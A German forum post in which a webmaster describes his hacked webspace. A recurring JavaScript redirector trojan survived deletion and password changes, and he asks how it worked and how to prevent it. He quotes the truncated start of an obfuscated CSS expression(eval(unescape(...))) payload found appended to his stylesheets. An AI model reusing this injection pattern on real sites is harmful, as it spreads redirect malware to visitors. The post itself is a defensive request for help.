Ich möchte euch mal ein Problem mit meiner gehackten Homepage (keine Sorge, ist ist kein phpBB!) schildern, weil ich gerne verstehen möchte wie sowas funktioniert bzw. vielleicht hätte verhindert werden können! Mir ist natürlich klar, daß ihr mir nicht bei der genauen Lösung helfen könnt, aber vielleicht bringt ihr mir ja ein wenig Licht ins Dunkle?
Also, ich hatte auf meinem Webspace 3 verschiedene Systeme laufen und zwar 1 CMS, 1 Shop und einen Anzeigenmarkt - alles drei von unterschiedlichen Herstellern und für jedes System eine eigene MySQL-Datenbank und alle Datenbanken mit eigenen Passwörtern.
Plötzlich bekam ich bei jedem Aufruf einer der Seiten eine Viruswarnung und zwar "Trojan.JS.Redirector.e" der sich offenbar über eine "check.js" eingeschlichen hat.
So, nun habe ich natürlich meinen Webspace nach diesem "check.js" durchsucht und dann auch gefunden und zwar in einem harmlos erscheinenden Ordner, den ich selbst irgendwann mal angelegt, aber dann nicht mehr gebraucht habe. Gut, denke ich mir und habe den Ordner gelöscht und das FTP-Passwort geändert, aber denkste, schon bald war das Ding wieder da!

Dann habe ich freilich ein "verdächtiges" System nach dem anderen samt Datenbank gelöscht bis nur noch eines über geblieben ist und trotzdem kommt der schei... Trojaner wieder! Klar, dann natürlich auch noch das letzte System gelöscht und nun ist freilich Ruhe.
Nur mir hat das klarerweise keine Ruhe gelassen, habe weitergesucht und siehe da, in sämtlichen css-Dateien (bei allen 3 Systemen) hat sich gut versteckt am Ende so ein Mist wie dieser eingenistet:
Code: Alles auswählen
expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65 %74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20% .................(den Rest hab ich weggelassen)
Wie gesagt, ich möchte es nur irgendwie verstehen - läuft das über irgendein "automatisches" Skript, oder hat da jemand selbst Hand angelegt?
Wäre super, wenn mir irgendwer von euch das halbwegs verständlich erklären könnte und vielleicht sogar einen Tipp für mich hat, wie ich sowas künftig verhindern kann!
Vielen Dank schon mal!
lg maxl